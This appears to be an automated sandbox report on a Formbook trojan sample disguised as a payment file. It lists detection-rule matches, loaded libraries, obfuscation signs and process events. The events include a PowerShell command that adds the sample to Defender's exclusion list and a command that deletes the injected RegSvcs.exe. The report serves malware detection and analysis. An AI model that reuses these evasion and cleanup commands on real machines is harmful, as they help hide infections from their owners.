          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.4458911697.000000000E4E6000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: Process Memory Space: Pago pendiente.exe PID: 5824, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: RegSvcs.exe PID: 5840, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 1644, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Pago pendiente.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, IQKgXNAjhiaS4o0dDr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, IQKgXNAjhiaS4o0dDr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, IQKgXNAjhiaS4o0dDr.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.cs | Security API names: _0020.AddAccessRule
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@11/6@12/3
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_000638B0 HeapSetInformation,StrCmpICW,CompareStringOrdinal,CompareStringOrdinal,CoTaskMemFree,StrCmpICW,IsOS,CompareStringOrdinal,StrCmpICW,StrCmpICW,lstrlenW,AllowSetForegroundWindow,ShellExecuteExW,CoInitializeEx,CoCreateInstance,CoUninitialize, 7_2_000638B0
          Source: C:\Users\user\Desktop\Pago pendiente.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Pago pendiente.exe.log
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iofqxz1p.z2x.ps1
          Source: Pago pendiente.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Pago pendiente.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Pago pendiente.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Pago pendiente.exe | ReversingLabs: Detection: 23%
          Source: C:\Users\user\Desktop\Pago pendiente.exe | File read: C:\Users\user\Desktop\Pago pendiente.exe:Zone.Identifier
          Source: unknown | Process created: C:\Users\user\Desktop\Pago pendiente.exe "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe"
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\SysWOW64\control.exe"
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: textshaping.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: slc.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\explorer.exe | Section loaded: workfoldersshell.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
          Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\Pago pendiente.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Pago pendiente.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Pago pendiente.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: Pago pendiente.exe, Form1.cs | .Net Code: InitializeComponent
          Source: 0.2.Pago pendiente.exe.7700000.11.raw.unpack, HomeView.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.32f8498.5.raw.unpack, HomeView.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, GDVHnCd8e4hct1HQKy.cs | .Net Code: nM5Y8yY844OV97SlUkr System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.5300000.10.raw.unpack, GDVHnCd8e4hct1HQKy.cs | .Net Code: nM5Y8yY844OV97SlUkr System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, GDVHnCd8e4hct1HQKy.cs | .Net Code: nM5Y8yY844OV97SlUkr System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Code function: 0_2_077261E5 pushad ; retf 0_2_077261E6
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Code function: 0_2_077261EF pushad ; retf 0_2_077261F0
          Source: C:\Users\user\Desktop\Pago pendiente.exe | Code function: 0_2_07A545D4 push ebp; retf 0_2_07A545D5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00417024 push ecx; iretd 5_2_00417025
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_004170C2 push edx; ret 5_2_004170CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_004073EB push ebp; ret 5_2_004073EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00416CC8 push D1939A9Fh; retf 5_2_00416CCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041D56C push eax; ret 5_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041D502 push eax; ret 5_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0041D50B push eax; ret 5_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_014309AD push ecx; mov dword ptr [esp], ecx 5_2_014309B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_0140135E push eax; iretd 5_2_01401369
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E4D1B02 push esp; retn 0000h 6_2_0E4D1B03
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E4D1B1E push esp; retn 0000h 6_2_0E4D1B1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E4D19B5 push esp; retn 0000h 6_2_0E4D1AE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_101CF9B5 push esp; retn 0000h 6_2_101CFAE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_101CFB1E push esp; retn 0000h 6_2_101CFB1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_101CFB02 push esp; retn 0000h 6_2_101CFB03
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_0006486D push ecx; ret 7_2_00064880
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B27FA pushad ; ret 7_2_047B27F9
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B225F pushad ; ret 7_2_047B27F9
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047B283D push eax; iretd 7_2_047B2858
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_047E09AD push ecx; mov dword ptr [esp], ecx 7_2_047E09B6
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025A73EB push ebp; ret 7_2_025A73EC
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025B7024 push ecx; iretd 7_2_025B7025
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025B70C2 push edx; ret 7_2_025B70CA
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BD4B5 push eax; ret 7_2_025BD508
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BD56C push eax; ret 7_2_025BD572
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BD50B push eax; ret 7_2_025BD572
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_025BD502 push eax; ret 7_2_025BD508
          Source: Pago pendiente.exe | Static PE information: section name: .text entropy: 7.9402587845762955
          Source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, p9IUFAmHiMdrlKeUBu.cs, High entropy of concatenated method names: 'ptJbMH6R4K', 'eeXbuRFTuS', 'KOrbG4TY6Y', 'dpSb96egsG', 'sUYbJ1a2cO', 'SM3bDBJv5Z', 'Ui0b6YTyr8', 'PQW7Q3wFcG', 'TbL7iDSMqG', 'CAS7j6pI8J'
